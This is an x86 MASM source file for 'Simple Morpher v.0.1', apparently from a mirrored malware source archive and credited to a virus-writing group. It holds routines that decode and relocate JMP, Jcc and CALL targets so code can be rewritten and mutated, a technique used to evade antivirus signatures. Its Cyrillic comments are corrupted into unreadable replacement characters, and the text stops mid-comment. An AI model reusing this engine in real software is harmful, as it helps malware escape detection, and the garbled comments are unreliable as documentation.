mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-22 01:58:51 +00:00
510 lines
16 KiB
NASM
510 lines
16 KiB
NASM
|
|
|||
|
;::::::::::::::::::::::::::::::::::::::::::::::::::::::
|
|||
|
; Simple Morpher v.0.1 :
|
|||
|
; :
|
|||
|
; x0man <20> 2008 :
|
|||
|
; :
|
|||
|
; http://www.virustech.org/ :
|
|||
|
;::::::::::::::::::::::::::::::::::::::::::::::::::::::
|
|||
|
;-----------------------------------------------------------------------------------------:
|
|||
|
; :
|
|||
|
;<3B> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>, <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>. :
|
|||
|
; :
|
|||
|
;<3B><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> :
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>: :
|
|||
|
; :
|
|||
|
;_OPCODE struct; :
|
|||
|
; dwOldAddress dd ? ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> (<28><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>) :
|
|||
|
; dwNewAddress dd ? ; <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> (<28><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>) :
|
|||
|
; dwJumpAddress dd ? ; <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>(<28><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>) :
|
|||
|
; ; (<28><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>) :
|
|||
|
; dwLength dd ? ; <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> :
|
|||
|
; ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD> :) :
|
|||
|
;_OPCODE ends :
|
|||
|
; :
|
|||
|
;<3B> "<22><><EFBFBD>" <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> :
|
|||
|
; 1. <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD>, <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> :
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>, <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> _OPCODE. :
|
|||
|
; 2. <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> (<28><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>) :
|
|||
|
; 3. <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>, <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> :
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> EIP <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD>. :
|
|||
|
; 4. <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> (<28><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> NOP) :
|
|||
|
; :
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> :
|
|||
|
; 1. <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> :
|
|||
|
; 2. <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>, <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> :
|
|||
|
; <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>, <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>(<28><><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD>). :
|
|||
|
; :
|
|||
|
; :
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD>... <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD>! :
|
|||
|
; :
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD> Catchy_32, <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> :
|
|||
|
; http://www.wasm.ru, <20><> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>. :
|
|||
|
; :
|
|||
|
;GreeTz: :
|
|||
|
; Osen :
|
|||
|
; izee [ EOF-Project ] http://eof-project.net/ :
|
|||
|
; :
|
|||
|
; tPORt (http://www.tport.org/) :
|
|||
|
; REVENGE(http://www.revenge-crew.com/) :
|
|||
|
; TLG (http://tlg.astalavista.ms/) :
|
|||
|
; TSRh (http://tsrh.org.ua/) :
|
|||
|
; TPOC (http://vx.netlux.org/tpoc/) :
|
|||
|
; :
|
|||
|
; :
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>! :
|
|||
|
; :
|
|||
|
; 10.05.2008 :
|
|||
|
; x0man [VirusTech] :
|
|||
|
; http://www.virustech.org :
|
|||
|
;-----------------------------------------------------------------------------------------:
|
|||
|
|
|||
|
.386
|
|||
|
.model flat, stdcall
|
|||
|
option casemap :none
|
|||
|
|
|||
|
include \MASM32\INCLUDE\windows.inc
|
|||
|
include \MASM32\INCLUDE\kernel32.inc
|
|||
|
include \MASM32\INCLUDE\user32.inc
|
|||
|
|
|||
|
includelib \MASM32\LIB\kernel32.lib
|
|||
|
includelib \MASM32\LIB\user32.lib
|
|||
|
|
|||
|
; #########################################################################
|
|||
|
|
|||
|
_OPCODE struct
|
|||
|
dwOldAddress dd ? ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> (<28><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>)
|
|||
|
dwNewAddress dd ? ; <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> (<28><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>)
|
|||
|
dwJumpAddress dd ? ; <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>(<28><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>)
|
|||
|
; (<28><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>)
|
|||
|
dwLength dd ? ; <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD> :)
|
|||
|
_OPCODE ends
|
|||
|
|
|||
|
; #########################################################################
|
|||
|
|
|||
|
.code
|
|||
|
|
|||
|
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
|
|||
|
; <20><><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> :)
|
|||
|
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
|
|||
|
test_code:
|
|||
|
@@:
|
|||
|
jmp @F
|
|||
|
mov eax, edx
|
|||
|
pop eax
|
|||
|
push eax
|
|||
|
call @F
|
|||
|
cmp eax, 0
|
|||
|
jne @B
|
|||
|
jmp @B
|
|||
|
add ecx, edx
|
|||
|
add eax, edx
|
|||
|
xchg edx, ecx
|
|||
|
call @B
|
|||
|
jne @F
|
|||
|
db 0,0,0,0,0,0,0,0,0,0
|
|||
|
db 0,0,0,0,0,0,0,0,0,0
|
|||
|
db 0,0,0,0,0,0,0,0,0,0
|
|||
|
db 0,0,0,0,0,0,0,0,0,0
|
|||
|
db 0,0,0,0,0,0,0,0,0,0
|
|||
|
db 0,0,0,0,0,0,0,0,0,0
|
|||
|
db 0,0,0,0,0,0,0,0,0,0
|
|||
|
db 0,0,0,0,0,0,0,0,0,0
|
|||
|
db 0,0,0,0,0,0,0,0,0,0
|
|||
|
db 0,0,0,0,0,0,0,0,0,0
|
|||
|
db 0,0,0,0,0,0,0,0,0,0
|
|||
|
db 0,0,0,0,0,0,0,0,0,0
|
|||
|
db 0,0,0,0,0,0,0,0,0,0
|
|||
|
db 0,0,0,0,0,0,0,0,0,0
|
|||
|
db 0,0,0,0,0,0,0,0,0,0
|
|||
|
jne @B
|
|||
|
ret
|
|||
|
@@:
|
|||
|
ret
|
|||
|
int 3
|
|||
|
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
|
|||
|
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
|
|||
|
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
;::::::::::::::::::::::::::::::::::
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
include Catchy32\Catchy32.inc
|
|||
|
|
|||
|
|
|||
|
|
|||
|
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::|
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>, <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>|
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>: dwCurrentAddress - <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD> |
|
|||
|
; |
|
|||
|
; 00000000: 74 30 JE imm8 |
|
|||
|
; <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> "imm8" |
|
|||
|
; <20> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> imm8 = 00000000 + 30 + 2 = 00000032 |
|
|||
|
; <20>.<2E>. |
|
|||
|
; 00000000 - <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> |
|
|||
|
; 30 - <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> |
|
|||
|
; 2 - <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> JE imm8 |
|
|||
|
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::|
|
|||
|
; 00000000: 74 30 JE 00000032 --. |
|
|||
|
; 00000002: | |
|
|||
|
; | |
|
|||
|
; 00000032: <-----<2D> |
|
|||
|
; <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> "<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>" <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> |
|
|||
|
; <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>, <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> |
|
|||
|
; <20><><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> ;-) |
|
|||
|
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::|:::|
|
|||
|
; IN dwCurrentAddress : <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> |
|
|||
|
; OUT EAX : <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> |
|
|||
|
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::|
|
|||
|
get_jump_address proc dwCurrentAddress : DWORD
|
|||
|
|
|||
|
push ecx
|
|||
|
push edi
|
|||
|
|
|||
|
mov edi, dwCurrentAddress
|
|||
|
mov al, byte ptr [edi]
|
|||
|
|
|||
|
;:::::::::::::::::::::::::::::::::::::
|
|||
|
; XX imm8
|
|||
|
cmp al, 070h
|
|||
|
jl @F
|
|||
|
cmp al, 07Fh
|
|||
|
jna @_jump_imm8_
|
|||
|
|
|||
|
@@:
|
|||
|
;:::::::::::::::::::::::::::::::::::::
|
|||
|
cmp al, 0EBh
|
|||
|
je @_jump_uncond_imm8_
|
|||
|
;:::::::::::::::::::::::::::::::::::::
|
|||
|
; 0F XX imm32
|
|||
|
cmp al, 00Fh
|
|||
|
jne @F
|
|||
|
mov ah, byte ptr [edi + 1]
|
|||
|
cmp ah, 080h
|
|||
|
jl @F
|
|||
|
cmp ah, 08Fh
|
|||
|
jna @_jump_imm32_
|
|||
|
;:::::::::::::::::::::::::::::::::::::
|
|||
|
|
|||
|
@@:
|
|||
|
;:::::::::::::::::::::::::::::::::::::
|
|||
|
; JMP imm32
|
|||
|
cmp al, 0E9h
|
|||
|
je @_jump_uncond_imm32_
|
|||
|
|
|||
|
|
|||
|
;:::::::::::::::::::::::::::::::::::::
|
|||
|
; CALL
|
|||
|
cmp al, 0E8h
|
|||
|
je @_call_imm32_
|
|||
|
|
|||
|
|
|||
|
;:::::::::::::::::::::::::::::::::::::
|
|||
|
jmp @_exit_
|
|||
|
;:::::::::::::::::::::::::::::::::::::
|
|||
|
|
|||
|
@_jump_imm8_:
|
|||
|
@_jump_uncond_imm8_:
|
|||
|
;:::::::::::::::::::::::::::::::::::::
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
movzx eax, byte ptr [edi + 1]
|
|||
|
mov cl, al
|
|||
|
test cl, 10000000b ; isNegative?
|
|||
|
|
|||
|
jnz @_neg_1
|
|||
|
add edi, eax
|
|||
|
add edi, 2
|
|||
|
xchg eax, edi
|
|||
|
jmp @_exit_
|
|||
|
|
|||
|
@_neg_1:
|
|||
|
neg al
|
|||
|
sub al, 2
|
|||
|
sub edi, eax
|
|||
|
xchg eax, edi
|
|||
|
jmp @_exit_
|
|||
|
|
|||
|
|
|||
|
@_jump_imm32_:
|
|||
|
;:::::::::::::::::::::::::::::::::::::
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
mov eax, dword ptr [edi + 2]
|
|||
|
mov ecx, eax
|
|||
|
shr ecx, 24d
|
|||
|
test ecx, 10000000b ; isNegative?
|
|||
|
|
|||
|
jnz @_neg_2
|
|||
|
add eax, edi
|
|||
|
add eax, 6
|
|||
|
jmp @_exit_
|
|||
|
|
|||
|
@_neg_2:
|
|||
|
neg eax
|
|||
|
sub eax, 6
|
|||
|
sub edi, eax
|
|||
|
xchg eax, edi
|
|||
|
jmp @_exit_
|
|||
|
;:::::::::::::::::::::::::::::::::::::
|
|||
|
|
|||
|
|
|||
|
|
|||
|
@_jump_uncond_imm32_:
|
|||
|
@_call_imm32_:
|
|||
|
;:::::::::::::::::::::::::::::::::::::
|
|||
|
; JMP imm32 & CALL imm32
|
|||
|
mov eax, dword ptr [edi + 1]
|
|||
|
mov ecx, eax
|
|||
|
shr ecx, 24d
|
|||
|
test ecx, 10000000b ; isNegative?
|
|||
|
|
|||
|
jnz @_neg_3
|
|||
|
add edi, eax
|
|||
|
add edi, 5
|
|||
|
xchg eax, edi
|
|||
|
jmp @_exit_
|
|||
|
|
|||
|
@_neg_3:
|
|||
|
neg eax
|
|||
|
sub eax, 5
|
|||
|
sub edi, eax
|
|||
|
xchg eax, edi
|
|||
|
;///////////////////////////////////////
|
|||
|
@_exit_:
|
|||
|
|
|||
|
pop edi
|
|||
|
pop ecx
|
|||
|
|
|||
|
ret
|
|||
|
get_jump_address endp
|
|||
|
|
|||
|
|
|||
|
;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::|
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> |
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>.... |
|
|||
|
; |
|
|||
|
; IN dwAddress - <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> |
|
|||
|
; IN pOpcodes - <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> |
|
|||
|
; OUT EAX - <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>... |
|
|||
|
;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::|
|
|||
|
get_new_jump_address proc dwAddress:DWORD, pOpcodes : DWORD
|
|||
|
push ecx
|
|||
|
|
|||
|
assume ecx : ptr _OPCODE
|
|||
|
mov ecx, pOpcodes
|
|||
|
mov eax, dwAddress
|
|||
|
|
|||
|
@@:
|
|||
|
cmp [ecx].dwOldAddress, eax
|
|||
|
je @F
|
|||
|
add ecx, sizeof _OPCODE
|
|||
|
cmp [ecx].dwOldAddress, 0
|
|||
|
jne @B
|
|||
|
xor eax, eax
|
|||
|
@@:
|
|||
|
mov eax, [ecx].dwNewAddress
|
|||
|
|
|||
|
pop ecx
|
|||
|
ret
|
|||
|
get_new_jump_address endp
|
|||
|
|
|||
|
|
|||
|
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::|
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD>, <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> NOP |
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD>! <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> 0CCh |
|
|||
|
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::|
|
|||
|
; IN dwCodeAddress - <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> |
|
|||
|
; IN dwOutputBuffer - <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> |
|
|||
|
